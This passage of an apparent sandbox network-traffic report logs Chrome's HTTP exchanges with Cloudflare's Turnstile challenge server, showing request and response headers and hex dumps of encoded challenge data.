                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                CF-Challenge: D9FHRl2BpZjliNMgDyuZOYbu5d2HtaznsinZzmz5MBU-1736285763-1.1.1.1-HKIOzuGxr_aQvzCfppdTbPN_zP_Hq18hKmQyJT3mFLCaJY32a.duvmYyY6NCi1it
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: */*
                                                                Origin: https://challenges.cloudflare.com
                                                                Sec-Fetch-Site: same-origin
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/nrw71/0x4AAAAAAA1mOjQlyo8gEN4C/auto/fbE/normal/auto/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-07 21:36:09 UTC16384OUTData Raw: 76 5f 38 66 65 37 31 34 63 36 39 64 37 34 38 63 32 39 3d 38 69 37 79 67 70 57 4c 35 70 35 77 37 77 51 57 25 32 62 62 37 79 6d 69 70 4c 70 54 48 46 48 70 79 57 64 77 55 48 4a 48 4f 37 70 7a 48 74 79 70 44 4b 77 63 48 24 70 48 77 36 4b 77 70 48 4d 79 37 4d 4d 35 58 34 48 6f 64 77 6d 41 4e 4e 79 57 54 48 59 36 70 70 48 57 52 79 58 74 48 54 36 70 34 34 69 79 6c 73 48 41 62 77 48 48 2d 48 34 75 73 6d 48 36 64 57 55 4c 6e 4b 73 79 57 63 78 73 49 43 35 43 58 34 34 62 73 57 53 4e 48 57 73 58 48 6d 64 4b 48 62 64 48 43 4c 36 57 43 6a 47 56 58 46 70 6b 64 47 62 70 37 2b 44 52 48 70 6e 62 64 58 58 70 79 56 66 62 2b 46 70 68 6a 6c 64 48 38 4c 36 48 6c 51 64 4b 58 37 61 37 4e 57 57 4e 58 41 42 59 4c 30 51 43 73 51 35 2b 58 41 57 2b 4d 58 72 55 56 35 36 70 6e 72 24 4d
                                                                Data Ascii: v_8fe714c69d748c29=8i7ygpWL5p5w7wQW%2bb7ymipLpTHFHpyWdwUHJHO7pzHtypDKwcH$pHw6KwpHMy7MM5X4HodwmANNyWTHY6ppHWRyXtHT6p44iylsHAbwHH-H4usmH6dWULnKsyWcxsIC5CX44bsWSNHWsXHmdKHbdHCL6WCjGVXFpkdGbp7+DRHpnbdXXpyVfb+FphjldH8L6HlQdKX7a7NWWNXABYL0QCsQ5+XAW+MXrUV56pnr$M
                                                                2025-01-07 21:36:09 UTC15730OUTData Raw: 37 55 37 6f 35 70 35 57 57 77 69 48 36 79 52 79 6a 4e 48 48 62 56 33 24 6b 48 77 79 6c 2b 57 41 48 6f 48 77 38 58 58 48 51 70 77 7a 66 62 4e 37 36 57 30 56 30 30 4e 48 4e 32 58 4b 48 66 48 57 36 48 65 48 43 48 48 51 57 59 68 51 69 4f 37 48 6e 37 48 48 42 53 6b 68 48 51 39 58 4b 57 43 54 41 79 77 69 48 57 48 4b 36 4f 50 79 72 48 6d 36 62 73 57 65 48 78 79 6c 6f 57 38 48 49 36 70 79 48 6c 48 70 38 6f 73 57 31 48 2d 64 62 35 70 6d 48 4e 6e 57 70 57 68 48 76 55 62 48 57 73 79 38 48 48 36 66 64 79 44 36 62 74 79 42 74 54 39 77 30 56 6d 48 72 36 57 57 48 4c 79 34 48 6c 32 57 37 64 51 36 51 4e 70 36 48 46 79 51 61 35 57 36 77 44 32 79 48 64 48 6d 64 4e 73 5a 47 36 4e 52 62 6f 70 71 48 53 36 51 37 57 70 48 34 43 47 4b 48 7a 48 53 48 70 61 36 6c 68 66 54 77 36 48
                                                                Data Ascii: 7U7o5p5WWwiH6yRyjNHHbV3$kHwyl+WAHoHw8XXHQpwzfbN76W0V00NHN2XKHfHW6HeHCHHQWYhQiO7Hn7HHBSkhHQ9XKWCTAywiHWHK6OPyrHm6bsWeHxyloW8HI6pyHlHp8osW1H-db5pmHNnWpWhHvUbHWsy8HH6fdyD6btyBtT9w0VmHr6WWHLy4Hl2W7dQ6QNp6HFyQa5W6wD2yHdHmdNsZG6NRbopqHS6Q7WpH4CGKHzHSHpa6lhfTw6H
                                                                2025-01-07 21:36:09 UTC318INHTTP/1.1 200 OK
                                                                Date: Tue, 07 Jan 2025 21:36:09 GMT
                                                                Content-Type: text/plain; charset=UTF-8
                                                                Content-Length: 26288
                                                                Connection: close
                                                                cf-chl-gen: vuVkVcQs6n2dY7Jx/vkmzL7IpsylfiA/L0S0MJ3Kh9ZfdDJji5Cou8reImuJ4N+uriM=$rK4xm4wWpxBKwJI/
                                                                Server: cloudflare
                                                                CF-RAY: 8fe714eb4f9941f3-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2025-01-07 21:36:09 UTC1051INData Raw: 61 49 35 53 63 6f 64 32 62 4a 64 77 65 46 2b 5a 64 70 71 54 59 4b 42 6a 67 47 69 43 64 34 42 73 68 6e 75 6a 68 6f 6c 2f 73 34 36 54 6c 6e 5a 7a 6a 35 53 77 76 58 56 2f 6a 35 48 44 72 61 32 45 77 62 79 31 71 70 53 6a 6c 4b 47 63 76 61 43 6a 69 4e 4c 49 31 61 36 76 79 73 72 48 75 71 32 58 76 36 75 6f 72 62 79 56 74 37 37 68 7a 35 37 47 70 39 6e 4e 33 75 66 50 76 4c 48 51 7a 2b 61 75 7a 63 66 6a 36 2f 53 30 73 75 61 36 78 2b 6e 32 76 2f 41 43 34 67 50 33 38 66 6a 69 36 2f 54 6c 2b 38 66 43 2b 77 66 6b 33 76 30 46 35 74 63 51 47 66 76 79 46 74 6b 4d 37 39 72 71 34 50 4c 77 42 65 38 54 2b 65 63 43 2f 67 51 48 2b 7a 48 6a 37 41 77 4e 44 79 41 51 46 68 4d 48 4c 51 34 74 4a 77 34 30 4e 69 50 38 4e 52 34 77 46 6b 51 43 4b 41 6f 47 54 53 63 61 47 6a 45 75 54 51 38
                                                                Data Ascii: aI5Scod2bJdweF+ZdpqTYKBjgGiCd4Bshnujhol/s46TlnZzj5SwvXV/j5HDra2Ewby1qpSjlKGcvaCjiNLI1a6vysrHuq2Xv6uorbyVt77hz57Gp9nN3ufPvLHQz+auzcfj6/S0sua6x+n2v/AC4gP38fji6/Tl+8fC+wfk3v0F5tcQGfvyFtkM79rq4PLwBe8T+ecC/gQH+zHj7AwNDyAQFhMHLQ4tJw40NiP8NR4wFkQCKAoGTScaGjEuTQ8
                                                                2025-01-07 21:36:09 UTC1369INData Raw: 57 66 49 53 77 62 61 75 43 72 32 39 79 72 4b 56 31 74 70 6c 7a 72 4c 4f 61 6c 6e 65 2b 72 70 53 38 6d 4d 65 69 74 62 2b 61 6f 4b 47 5a 78 5a 37 45 79 64 43 50 78 4c 2b 67 6f 72 50 4d 78 4c 69 70 33 35 75 32 6d 63 47 77 75 37 72 54 78 75 47 30 74 74 36 37 76 71 72 4e 79 72 44 48 7a 36 37 70 79 2b 61 77 31 73 54 70 38 39 76 7a 38 2f 62 66 30 77 54 67 77 2f 6a 61 38 67 4d 43 35 65 77 41 42 38 7a 38 42 4d 6a 63 45 4d 37 67 44 68 6e 77 45 78 72 76 37 68 77 42 48 50 34 44 48 78 77 65 45 78 4c 34 42 51 6b 43 39 79 77 51 35 66 72 2b 4d 68 41 6a 4b 41 63 74 49 66 4d 4a 2b 79 63 65 4c 43 30 58 47 50 52 46 4e 68 38 30 48 67 6b 61 4a 53 41 35 48 45 4a 44 49 41 52 41 44 77 78 4c 4c 68 49 75 4f 42 4e 62 4c 6c 63 33 55 54 67 37 56 6d 4e 4f 49 54 64 6f 56 6b 46 48 50 57
                                                                Data Ascii: WfISwbauCr29yrKV1tplzrLOalne+rpS8mMeitb+aoKGZxZ7EydCPxL+gorPMxLip35u2mcGwu7rTxuG0tt67vqrNyrDHz67py+aw1sTp89vz8/bf0wTgw/ja8gMC5ewAB8z8BMjcEM7gDhnwExrv7hwBHP4DHxweExL4BQkC9ywQ5fr+MhAjKActIfMJ+yceLC0XGPRFNh80HgkaJSA5HEJDIARADwxLLhIuOBNbLlc3UTg7VmNOITdoVkFHPW
                                                                2025-01-07 21:36:09 UTC1369INData Raw: 6a 4a 4f 77 6f 49 43 51 6c 49 71 73 66 4a 57 6f 76 35 42 39 65 59 50 46 75 59 53 35 68 4b 53 6a 6d 34 61 35 30 4b 36 4a 76 4d 75 53 6a 61 4f 77 73 38 71 37 6c 63 76 4c 30 4a 71 6f 72 4c 47 61 6f 36 47 37 77 63 54 54 31 2b 43 6f 6e 36 65 38 79 4d 37 6d 76 72 37 49 36 4f 37 4d 31 4f 6a 6c 36 75 66 79 2f 72 73 44 77 75 75 36 32 64 76 65 34 66 7a 64 43 63 54 4d 35 4d 76 6b 44 4d 2f 6b 36 52 45 4b 42 67 54 74 2b 50 41 4c 2f 76 77 67 37 51 4d 64 41 78 2f 58 43 41 63 6b 35 69 73 69 2f 4f 63 61 2f 67 6b 78 38 65 6b 50 4d 44 49 46 4f 51 49 55 46 54 41 47 45 7a 67 55 4f 45 41 43 4f 67 4c 38 49 7a 34 6d 43 45 51 4c 4b 53 6f 6d 47 6a 39 42 4c 6b 67 69 4a 79 6f 6c 52 43 51 36 57 78 6f 52 48 68 67 69 51 6c 31 68 56 57 64 46 55 56 4a 44 54 45 42 59 63 46 41 77 58 31 4a
                                                                Data Ascii: jJOwoICQlIqsfJWov5B9eYPFuYS5hKSjm4a50K6JvMuSjaOws8q7lcvL0JqorLGao6G7wcTT1+Con6e8yM7mvr7I6O7M1Ojl6ufy/rsDwuu62dve4fzdCcTM5MvkDM/k6REKBgTt+PAL/vwg7QMdAx/XCAck5isi/Oca/gkx8ekPMDIFOQIUFTAGEzgUOEACOgL8Iz4mCEQLKSomGj9BLkgiJyolRCQ6WxoRHhgiQl1hVWdFUVJDTEBYcFAwX1J
                                                                2025-01-07 21:36:09 UTC1369INData Raw: 72 79 38 69 5a 75 58 71 48 4f 7a 78 4c 52 37 66 61 43 61 6d 36 44 4d 70 73 61 74 71 6f 32 61 7a 4b 54 42 6a 4c 44 49 70 74 72 4c 33 4c 4c 52 31 4f 43 67 30 72 4f 36 73 38 58 6e 73 36 57 38 36 39 6e 6a 77 73 36 2f 30 63 2f 66 34 36 37 74 79 62 44 6d 38 4d 7a 4a 39 76 69 37 38 50 59 44 37 4f 44 75 37 67 6a 5a 76 77 72 37 34 38 59 48 37 2b 2f 2b 2f 73 33 38 38 4e 49 46 42 52 6b 49 34 74 76 57 42 74 6f 52 2b 43 41 67 48 78 51 43 38 78 67 61 35 53 55 66 49 51 33 72 4d 65 6b 66 4a 43 6f 31 4e 67 67 34 4f 44 59 57 38 2f 62 30 4d 30 41 74 4f 52 4d 30 4d 55 4e 42 42 69 67 32 47 69 55 4d 54 45 6c 4a 47 6a 38 66 48 53 63 57 53 7a 6c 53 4a 44 49 35 4a 56 68 61 57 54 38 37 4c 7a 74 68 52 57 46 45 49 57 49 71 59 44 34 33 49 56 35 73 4f 69 56 49 5a 48 4d 31 64 48 56 54
                                                                Data Ascii: ry8iZuXqHOzxLR7faCam6DMpsatqo2azKTBjLDIptrL3LLR1OCg0rO6s8Xns6W869njws6/0c/f467tybDm8MzJ9vi78PYD7ODu7gjZvwr748YH7+/+/s388NIFBRkI4tvWBtoR+CAgHxQC8xga5SUfIQ3rMekfJCo1Ngg4ODYW8/b0M0AtORM0MUNBBig2GiUMTElJGj8fHScWSzlSJDI5JVhaWT87LzthRWFEIWIqYD43IV5sOiVIZHM1dHVT
                                                                2025-01-07 21:36:09 UTC1369INData Raw: 6d 63 77 38 4b 6d 68 5a 65 52 73 72 79 42 74 61 36 67 7a 63 36 4e 69 63 4f 70 79 63 7a 54 74 38 75 71 31 37 62 53 31 4a 48 4b 31 64 33 54 6e 73 50 45 30 63 4c 69 6f 2b 43 32 75 63 65 2f 77 75 58 65 70 65 33 79 30 36 36 34 37 4f 6e 78 74 72 75 30 36 65 37 4c 37 50 6e 33 38 4e 33 31 76 75 45 4d 2b 38 4d 41 43 73 6a 64 79 67 66 53 45 38 37 49 38 4e 45 61 2b 76 72 30 45 42 41 51 32 74 33 59 42 42 48 69 46 52 6b 61 38 69 66 33 43 2b 63 74 37 53 48 39 43 53 34 50 38 51 38 4d 49 76 59 6f 46 42 41 49 39 43 41 74 44 44 45 78 51 68 41 65 48 43 63 58 4f 55 45 4d 44 55 6f 47 54 78 73 46 55 69 73 6b 44 52 63 77 4a 6b 70 46 45 78 30 52 4c 32 45 71 55 45 31 55 49 54 30 69 59 53 68 44 4f 32 77 70 58 45 64 73 51 54 78 45 52 55 56 41 51 47 4a 46 55 55 63 37 53 6e 78 4d 53
                                                                Data Ascii: mcw8KmhZeRsryBta6gzc6NicOpyczTt8uq17bS1JHK1d3TnsPE0cLio+C2uce/wuXepe3y06647Onxtru06e7L7Pn38N31vuEM+8MACsjdygfSE87I8NEa+vr0EBAQ2t3YBBHiFRka8if3C+ct7SH9CS4P8Q8MIvYoFBAI9CAtDDExQhAeHCcXOUEMDUoGTxsFUiskDRcwJkpFEx0RL2EqUE1UIT0iYShDO2wpXEdsQTxERUVAQGJFUUc7SnxMS
                                                                2025-01-07 21:36:09 UTC1369INData Raw: 42 6d 36 6a 4a 76 62 6d 63 69 35 69 69 71 35 4b 52 71 39 65 77 6c 71 33 5a 6d 70 75 30 30 61 65 63 74 64 47 6a 76 4c 79 78 77 36 48 56 78 4e 36 70 7a 71 6a 69 34 4e 43 72 7a 4f 2f 48 31 63 7a 35 32 4c 50 49 37 2b 58 63 2b 66 66 71 7a 4e 69 2f 37 76 6a 50 2b 39 67 4d 41 73 72 69 33 51 6f 53 34 42 51 53 78 76 48 68 43 68 6e 6f 30 75 50 62 38 76 6b 42 33 50 4d 42 48 78 34 47 34 43 4d 67 43 53 76 6a 48 52 59 69 37 2b 34 53 41 69 73 71 49 68 45 4e 38 79 4d 74 42 44 41 4e 51 44 62 2b 46 78 49 2b 52 68 56 49 52 76 6f 6d 46 6a 35 4e 48 51 63 59 45 43 63 75 4e 52 45 6f 4e 56 4e 53 4f 6b 34 63 47 7a 34 38 48 31 78 42 47 79 52 59 55 6c 77 66 57 6c 59 35 4b 44 55 2f 53 43 38 75 53 48 52 4e 4d 30 70 32 4e 7a 68 52 62 6b 51 35 55 6d 35 41 57 56 6c 4f 59 44 35 79 5a 56
                                                                Data Ascii: Bm6jJvbmci5iiq5KRq9ewlq3Zmpu00aectdGjvLyxw6HVxN6pzqji4NCrzO/H1cz52LPI7+Xc+ffqzNi/7vjP+9gMAsri3QoS4BQSxvHhChno0uPb8vkB3PMBHx4G4CMgCSvjHRYi7+4SAisqIhEN8yMtBDANQDb+FxI+RhVIRvomFj5NHQcYECcuNREoNVNSOk4cGz48H1xBGyRYUlwfWlY5KDU/SC8uSHRNM0p2NzhRbkQ5Um5AWVlOYD5yZV
                                                                2025-01-07 21:36:09 UTC1369INData Raw: 6f 4a 43 78 78 71 6a 4d 74 73 71 6f 7a 37 6d 6f 74 4d 75 39 76 5a 66 51 79 64 62 57 31 63 57 66 76 4e 6a 4a 79 4d 7a 63 32 73 75 76 34 4e 4c 41 7a 4f 50 55 72 38 7a 6d 32 75 37 49 76 4e 79 33 33 50 54 68 75 2f 72 34 35 62 2f 55 39 75 72 5a 77 2f 6e 75 33 4e 67 41 38 76 41 48 43 66 30 4b 31 77 6b 48 39 39 73 55 2f 4e 66 73 44 77 49 41 34 78 67 47 47 2f 6a 6f 43 76 66 72 49 52 59 6a 43 52 38 53 45 53 63 6b 46 68 62 76 4a 78 6f 4a 47 54 45 66 44 52 55 30 49 78 45 64 4e 54 4d 6c 45 54 30 71 50 79 45 38 4c 67 67 78 53 44 4a 48 4c 52 55 32 4a 53 31 49 4f 6a 6b 6c 55 54 30 59 55 31 42 44 51 68 78 59 52 6b 56 66 58 45 74 66 52 56 31 57 59 7a 31 70 58 31 41 30 5a 31 64 72 56 57 5a 61 53 55 56 77 58 31 34 34 64 47 4a 52 55 58 4a 6c 51 47 46 37 61 6c 6c 70 54 57 2b
                                                                Data Ascii: oJCxxqjMtsqoz7motMu9vZfQydbW1cWfvNjJyMzc2suv4NLAzOPUr8zm2u7IvNy33PThu/r45b/U9urZw/nu3NgA8vAHCf0K1wkH99sU/NfsDwIA4xgGG/joCvfrIRYjCR8SESckFhbvJxoJGTEfDRU0IxEdNTMlET0qPyE8LggxSDJHLRU2JS1IOjklUT0YU1BDQhxYRkVfXEtfRV1WYz1pX1A0Z1drVWZaSUVwX144dGJRUXJlQGF7allpTW+
                                                                2025-01-07 21:36:09 UTC1369INData Raw: 4d 76 4f 6d 4c 61 32 79 72 65 34 30 39 61 67 76 35 75 66 77 4e 4c 44 34 75 53 35 75 64 37 56 32 73 75 76 72 63 76 79 76 4c 44 54 73 4b 2f 6f 32 63 6e 79 7a 38 33 4e 38 75 6e 75 33 38 50 78 38 66 75 2f 30 66 4c 35 79 38 6a 72 79 4d 66 73 2b 38 6f 4c 35 2f 50 31 37 50 54 7a 30 68 4d 65 2b 2f 30 58 34 41 44 62 33 78 45 54 42 4f 4d 6c 43 51 72 6a 47 42 63 69 48 2f 41 51 41 65 34 69 49 68 51 6a 2b 42 6b 4b 4d 2f 77 62 39 2f 73 70 4c 79 41 37 51 53 51 6d 41 43 6f 7a 50 69 55 4e 4b 78 30 4c 50 6a 34 77 55 78 55 75 4e 6b 35 56 4e 69 64 4c 54 44 6c 54 47 30 35 4f 51 44 30 6c 51 6a 4e 58 57 45 56 67 59 79 31 4b 4f 31 39 68 54 57 63 76 59 6d 4a 55 61 7a 6c 57 52 32 74 74 57 58 52 33 51 56 35 50 63 33 4a 68 65 30 4e 32 64 6d 69 44 54 57 70 62 66 33 35 74 69 49 74 56
                                                                Data Ascii: MvOmLa2yre409agv5ufwNLD4uS5ud7V2suvrcvyvLDTsK/o2cnyz83N8unu38Px8fu/0fL5y8jryMfs+8oL5/P17PTz0hMe+/0X4ADb3xETBOMlCQrjGBciH/AQAe4iIhQj+BkKM/wb9/spLyA7QSQmACozPiUNKx0LPj4wUxUuNk5VNidLTDlTG05OQD0lQjNXWEVgYy1KO19hTWcvYmJUazlWR2ttWXR3QV5Pc3Jhe0N2dmiDTWpbf35tiItV


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                22192.168.2.1649744104.18.95.414437780C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-07 21:36:10 UTC599OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1702680241:1736281743:oHkGzRQEm0XBvPLraYKhN6D7o1wYu-qyAvxbR8tTHnY/8fe714c69d748c29/D9FHRl2BpZjliNMgDyuZOYbu5d2HtaznsinZzmz5MBU-1736285763-1.1.1.1-HKIOzuGxr_aQvzCfppdTbPN_zP_Hq18hKmQyJT3mFLCaJY32a.duvmYyY6NCi1it HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-07 21:36:10 UTC379INHTTP/1.1 404 Not Found
                                                                Date: Tue, 07 Jan 2025 21:36:10 GMT
                                                                Content-Type: application/json
                                                                Content-Length: 7
                                                                Connection: close
                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                cf-chl-out: /7YWgG74/1c4gJ4PoPRZ9ya/tP4PSTLAzrA=$TKG6EvyJr7krZuPn
                                                                Server: cloudflare
                                                                CF-RAY: 8fe714f0a89ac336-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2025-01-07 21:36:10 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                Data Ascii: invalid


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                23192.168.2.1649764104.18.95.414437780C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-07 21:36:29 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1702680241:1736281743:oHkGzRQEm0XBvPLraYKhN6D7o1wYu-qyAvxbR8tTHnY/8fe714c69d748c29/D9FHRl2BpZjliNMgDyuZOYbu5d2HtaznsinZzmz5MBU-1736285763-1.1.1.1-HKIOzuGxr_aQvzCfppdTbPN_zP_Hq18hKmQyJT3mFLCaJY32a.duvmYyY6NCi1it HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                Content-Length: 34532
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                Content-type: application/x-www-form-urlencoded
                                                                CF-Chl-RetryAttempt: 0
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                CF-Challenge: D9FHRl2BpZjliNMgDyuZOYbu5d2HtaznsinZzmz5MBU-1736285763-1.1.1.1-HKIOzuGxr_aQvzCfppdTbPN_zP_Hq18hKmQyJT3mFLCaJY32a.duvmYyY6NCi1it
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: */*
                                                                Origin: https://challenges.cloudflare.com
                                                                Sec-Fetch-Site: same-origin
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/nrw71/0x4AAAAAAA1mOjQlyo8gEN4C/auto/fbE/normal/auto/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-07 21:36:29 UTC16384OUTData Raw: 76 5f 38 66 65 37 31 34 63 36 39 64 37 34 38 63 32 39 3d 38 69 37 79 67 70 57 4c 35 70 35 77 37 77 51 57 25 32 62 62 37 79 6d 69 70 4c 70 54 48 46 48 70 79 57 64 77 55 48 4a 48 4f 37 70 7a 48 74 79 70 44 4b 77 63 48 24 70 48 77 36 4b 77 70 48 4d 79 37 4d 4d 35 58 34 48 6f 64 77 6d 41 4e 4e 79 57 54 48 59 36 70 70 48 57 52 79 58 74 48 54 36 70 34 34 69 79 6c 73 48 41 62 77 48 48 2d 48 34 75 73 6d 48 36 64 57 55 4c 6e 4b 73 79 57 63 78 73 49 43 35 43 58 34 34 62 73 57 53 4e 48 57 73 58 48 6d 64 4b 48 62 64 48 43 4c 36 57 43 6a 47 56 58 46 70 6b 64 47 62 70 37 2b 44 52 48 70 6e 62 64 58 58 70 79 56 66 62 2b 46 70 68 6a 6c 64 48 38 4c 36 48 6c 51 64 4b 58 37 61 37 4e 57 57 4e 58 41 42 59 4c 30 51 43 73 51 35 2b 58 41 57 2b 4d 58 72 55 56 35 36 70 6e 72 24 4d
                                                                Data Ascii: v_8fe714c69d748c29=8i7ygpWL5p5w7wQW%2bb7ymipLpTHFHpyWdwUHJHO7pzHtypDKwcH$pHw6KwpHMy7MM5X4HodwmANNyWTHY6ppHWRyXtHT6p44iylsHAbwHH-H4usmH6dWULnKsyWcxsIC5CX44bsWSNHWsXHmdKHbdHCL6WCjGVXFpkdGbp7+DRHpnbdXXpyVfb+FphjldH8L6HlQdKX7a7NWWNXABYL0QCsQ5+XAW+MXrUV56pnr$M
                                                                2025-01-07 21:36:29 UTC16384OUTData Raw: 37 55 37 6f 35 70 35 57 57 77 69 48 36 79 52 79 6a 4e 48 48 62 56 33 24 6b 48 77 79 6c 2b 57 41 48 6f 48 77 38 58 58 48 51 70 77 7a 66 62 4e 37 36 57 30 56 30 30 4e 48 4e 32 58 4b 48 66 48 57 36 48 65 48 43 48 48 51 57 59 68 51 69 4f 37 48 6e 37 48 48 42 53 6b 68 48 51 39 58 4b 57 43 54 41 79 77 69 48 57 48 4b 36 4f 50 79 72 48 6d 36 62 73 57 65 48 78 79 6c 6f 57 38 48 49 36 70 79 48 6c 48 70 38 6f 73 57 31 48 2d 64 62 35 70 6d 48 4e 6e 57 70 57 68 48 76 55 62 48 57 73 79 38 48 48 36 66 64 79 44 36 62 74 79 42 74 54 39 77 30 56 6d 48 72 36 57 57 48 4c 79 34 48 6c 32 57 37 64 51 36 51 4e 70 36 48 46 79 51 61 35 57 36 77 44 32 79 48 64 48 6d 64 4e 73 5a 47 36 4e 52 62 6f 70 71 48 53 36 51 37 57 70 48 34 43 47 4b 48 7a 48 53 48 70 61 36 6c 68 66 54 77 36 48
                                                                Data Ascii: 7U7o5p5WWwiH6yRyjNHHbV3$kHwyl+WAHoHw8XXHQpwzfbN76W0V00NHN2XKHfHW6HeHCHHQWYhQiO7Hn7HHBSkhHQ9XKWCTAywiHWHK6OPyrHm6bsWeHxyloW8HI6pyHlHp8osW1H-db5pmHNnWpWhHvUbHWsy8HH6fdyD6btyBtT9w0VmHr6WWHLy4Hl2W7dQ6QNp6HFyQa5W6wD2yHdHmdNsZG6NRbopqHS6Q7WpH4CGKHzHSHpa6lhfTw6H
                                                                2025-01-07 21:36:29 UTC1764OUTData Raw: 41 46 58 48 57 57 57 38 4d 30 71 4e 6b 57 43 42 46 42 53 43 72 6e 79 4c 2d 42 64 31 5a 36 48 64 57 76 48 6f 37 61 64 57 69 48 4b 72 32 6d 4e 35 57 47 36 57 48 4f 32 57 34 78 77 54 42 67 6f 4c 56 43 54 4a 38 58 4c 34 37 37 6c 78 48 4c 56 66 4a 38 38 67 52 48 78 6b 38 39 6e 6c 77 43 75 37 52 36 51 38 50 5a 44 61 58 73 48 48 54 4d 34 48 64 4c 75 32 62 64 4d 31 44 48 6a 34 31 4d 4e 4e 63 70 57 6a 65 7a 31 5a 34 51 32 48 41 72 57 35 73 64 57 79 51 32 37 4f 71 42 59 4e 33 42 77 55 64 4c 56 62 6f 48 79 67 51 48 6c 36 48 75 48 24 43 61 64 4f 66 6f 4f 52 32 52 4e 38 55 65 75 72 69 39 41 46 42 2d 31 6b 2b 34 54 67 48 44 55 6b 6a 46 6a 32 61 48 72 75 74 67 73 39 36 48 69 48 66 7a 73 69 48 51 48 38 35 52 72 72 69 57 6c 79 48 52 30 71 48 63 4a 47 61 5a 74 70 75 6b 7a
                                                                Data Ascii: AFXHWWW8M0qNkWCBFBSCrnyL-Bd1Z6HdWvHo7adWiHKr2mN5WG6WHO2W4xwTBgoLVCTJ8XL477lxHLVfJ88gRHxk89nlwCu7R6Q8PZDaXsHHTM4HdLu2bdM1DHj41MNNcpWjez1Z4Q2HArW5sdWyQ27OqBYN3BwUdLVboHygQHl6HuH$CadOfoOR2RN8Ueuri9AFB-1k+4TgHDUkjFj2aHrutgs96HiHfzsiHQH85RrriWlyHR0qHcJGaZtpukz
                                                                2025-01-07 21:36:30 UTC274INHTTP/1.1 200 OK
                                                                Date: Tue, 07 Jan 2025 21:36:30 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Content-Length: 4624
                                                                Connection: close
                                                                cf-chl-out: pHUnzVQrrOCNInyaMb9T+6vK06KmKDhbMxJ6cPMSLX7b44LWLcG301sM1ZuChOr6FPJV5RhRTua/V79lEnR2Nq2d2uwuojRKuCB9LEOv0g==$zFJY/R7WhYSge7/g
                                                                2025-01-07 21:36:30 UTC1187INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 2d 73 3a 20 35 76 76 42 31 76 4e 57 43 6f 67 55 6e 54 67 5a 33 64 56 71 32 33 75 78 51 44 59 53 65 57 33 39 39 5a 62 69 4c 6a 54 6d 6f 34 62 34 7a 66 50 75 64 39 4a 30 4e 53 50 79 65 51 36 33 77 33 58 2b 45 45 58 62 57 4c 61 48 64 6b 51 5a 4f 30 37 5a 71 54 65 38 38 62 38 34 6b 44 73 6b 72 2f 78 77 43 2b 59 2f 79 6f 4b 31 44 6b 63 6c 4c 39 63 41 52 54 34 6a 56 4f 6d 48 69 6a 49 59 4f 30 4d 37 76 31 67 61 46 30 73 72 42 6f 4c 66 6a 39 59 58 75 4a 6d 55 53 44 6a 65 64 77 74 77 44 77 45 4f 39 5a 76 69 4c 35 74 54 42 6f 4b 65 31 2b 35 2f 65 42 35 56 74 56 47 33 59 52 7a 46 32 41 68 33 6a 6f 6c 6d 53 43 47 33 6d 45 78 64 52 77 6e 48 42 69 51 55 78 4e 6f 70 74 6a 77 61 48 33 6c 56 76 76 66 70 71 30 75 62 75 4b 6f 43 59 74 6c 35 4d
                                                                Data Ascii: cf-chl-out-s: 5vvB1vNWCogUnTgZ3dVq23uxQDYSeW399ZbiLjTmo4b4zfPud9J0NSPyeQ63w3X+EEXbWLaHdkQZO07ZqTe88b84kDskr/xwC+Y/yoK1DkclL9cART4jVOmHijIYO0M7v1gaF0srBoLfj9YXuJmUSDjedwtwDwEO9ZviL5tTBoKe1+5/eB5VtVG3YRzF2Ah3jolmSCG3mExdRwnHBiQUxNoptjwaH3lVvvfpq0ubuKoCYtl5M
